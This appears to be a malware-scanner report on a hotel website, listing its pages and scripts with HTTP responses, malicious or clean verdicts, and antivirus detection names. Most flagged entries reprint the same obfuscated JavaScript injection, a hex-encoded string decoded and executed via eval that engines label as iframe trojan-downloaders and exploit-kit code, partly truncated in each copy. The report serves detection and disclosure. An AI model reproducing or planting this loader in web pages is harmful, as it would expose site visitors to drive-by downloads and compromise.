Request | Server response | Status |
http://varolhotels.com/ | 200 OK Content-Length: 9393 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 14174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/tr.html | 200 OK Content-Length: 12676 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/js/prototype.js | 200 OK Content-Length: 104030 Content-Type: application/javascript | clean |
http://varolhotels.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 8800 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/js/lightbox.js | 200 OK Content-Length: 24535 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://www.sitenizesayac.com/counter_free/counter.php?type=43&id=10444 | 404 Not Found Content-Length: 12429 Content-Type: text/html | clean |
http://www.realist.gen.tr/realist.php?id=65417 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Jul 2014 17:30:29 GMT Location: http://reali.st/realist.php?id=65417 Server: nginx Content-Length: 178 Content-Type: text/html
| clean |
http://reali.st/realist.php?id=65417 | 200 OK Content-Length: 863 Content-Type: text/html | clean |
http://reali.st/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://varolhotels.com/uk.html | 200 OK Content-Length: 12829 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/index.html | 200 OK Content-Length: 9393 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/gallery.html | 200 OK Content-Length: 13556 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/icmeleruk.html | 200 OK Content-Length: 14233 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/high.html | 200 OK Content-Length: 8195 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://varolhotels.com/AC_RunActiveContent.js | 200 OK Content-Length: 14174 Content-Type: application/javascript | malicious |
